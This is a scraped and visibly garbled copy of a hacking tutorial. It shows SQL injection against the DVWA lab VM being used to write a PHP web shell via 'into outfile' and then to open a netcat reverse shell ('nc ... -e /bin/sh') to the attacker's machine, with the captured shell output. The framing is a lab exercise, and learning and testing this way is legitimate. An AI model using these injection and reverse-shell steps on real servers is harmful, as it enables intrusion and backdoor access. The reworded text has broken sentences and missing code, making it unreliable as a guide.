قالب وردپرس درنا توس
Home / Tips and Tricks / How to Use SQL Injection to Run OS Commands & Get a Shell «Null Bytes :: WonderHowTo

How to Use SQL Injection to Run OS Commands & Get a Shell «Null Bytes :: WonderHowTo



One of the ultimate goals in hacking is the ability to obtain shells in order to run system commands and own a target or network. SQL injection is typically associated with databases and their data, but it can actually be used as a vector to gain a command shell.

We want to use DVWA, an intentionally vulnerable virtual machine, and Kali Linux to carry out our attack , SQL injection is one of the most common vulnerabilities.

SQL Injection Overview

SQL injection is one of the most common vulnerabilities caught on the web and can be one of the most dangerous. Attackers can inject malicious SQL code in order to extract sensitive information, modify or destroy existing data, or escalate the attack in an attempt to own the server.

There are many different types of SQL injection and different attack methods for the various database systems in use. Although this type of attack is one of the easiest to get started with, SQL injection can take years to truly master.

Step 1
: Target enumeration

DVWA using the default credentials, admin The first thing we need to do is log in to DVWA using the default credentials ] as the username and password as the password.

Next, go to the "Security" tab on the left, and set the security level to "low."

Navigate to the "SQL Injection" page to begin our attack. How to Use SQL Injection to Run OS Commands & Get a Shell ” width=”532″ height=”532″ style=”max-width:532px;height:auto;”/>

We want to verify that input is actually vulnerable to SQL injection. Which will indeed close vulnerable. When we do this, we see that it returns an error, even telling us that it is using MySQL as the database.

The next thing we need to do is enumerate the database and determine the number of columns in use. This will allow us to exploit a union-based injection of flaw in just a bit.

select first_name, surname from users where user_id = '';

This is probably what the query looks like on the backend, with first_name and surname being the selected columns, for a total of two columns. But we need to know for sure in order for this to work. For that, we can use the order by clause.

This clause wants to sort out the results of the query by columns. Since we are pretty sure there are at least two columns in use, if we order by 1 or 2, the query should be complete successfully. But what if we want to order by 3? If we are correct, then this query should throw an error.

Submit the following injection as input, and it should result in an error.

 'order by 3 # 

We can see that we do not get any error, so now we

Step 2: Shell Access & Command Execution

Now that we have a little more information about the database, we can use this to our advantage to perform a union-based SQL injection. The union select select statements, but have the same number of columns.

There are many things we can do with union-based injections, but this tutorial OS commands.

We need to determine the root directory of the web server to upload our shell. Depending on the application and the type of web server in use, this can vary, especially if an admin changes the default location or adequate permissions are in place. For the purposes of this demo, we will assume that the default web root of Apache ( / var / www / ) is public write permissions. Information about the web server, including the root directory, can usually be found in the "phpinfo.php" file.

We can use the into outfile command to write to a file. In this case, we want to insert a simple PHP script, which will be able to run system commands. The script, which we will aptly name "cmd.php," should look like this:

  

Now, let's perform the injection. The second part of the statement in single quotes – this will avoid syntax errors.

 'union select 1,'  'into outfile' /var/www/dvwa/cmd.php '# 

If this worked properly, we should now be able to access our shell via URL and by supplying a system command as a parameter. For example, whoami wants to give us current user information.

Or uname -a which will give

But using all these commands via URL parameter is sort of tedious.

Step 3: Reverse Shell with Netcat

Netcat is a powerful networking utility that can be used to troubleshoot connectivity issues, but it can actually be used by hackers as a backdoor and as a method to gain a shell. A lot of Linux distros have this utility installed by default, so if we can gain access, it's game over.

We want to first set up the listener on our local machine. Use the nc command along with the flags -lvp to specify, to verbose, and to set the port number, respectively.

 nc -lvp 1234
listening on [any] 1234 ... 

Next, as the parameter to our php shell in the url, enter the following command. It tells the server to execute a shell ( -e / bin / sh ) and send it back to our local machine.

 nc 172.16.1.100 1234 -e / bin / sh 

Give it a few seconds, and we should see our listener catch the shell and open a connection. id uname -a and ps as we see fit.

 connect to [172.16.1.100] from (UNKNOWN ) [172.16.1.102] 47643
id
uid = 33 (www-data) gid = 33 (www-data) groups = 33 (www-data)
uname -a
Linux metasploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU / Linux
ps
  PID TTY TIME CMD
 4665? 00:00:00 apache2
 4669? 00:00:00 apache2
 4671? 00:00:00 apache2
 4673? 00:00:00 apache2
 4674? 00:00:00 apache2
 4803? 00:00:00 apache2
 4810? 00:00:00 apache2
 4914? 00:00:00 php
 4915? 00:00:00 sh
 4919? 00:00:00 ps 

Wrapping Up

In this guide, we learn how to identify a vulnerable SQL injection point, enumerate the backend database, and use that information to upload a simple shell to the target system to get a reverse shell, allowing backdoor access to the web server. Do not miss: How to Use Netcat, the Swiss Army Knife of Hacking Tools

Cover image by NewPaddy / Pixabay; Screenshots by drd_ / Null Byte

Source link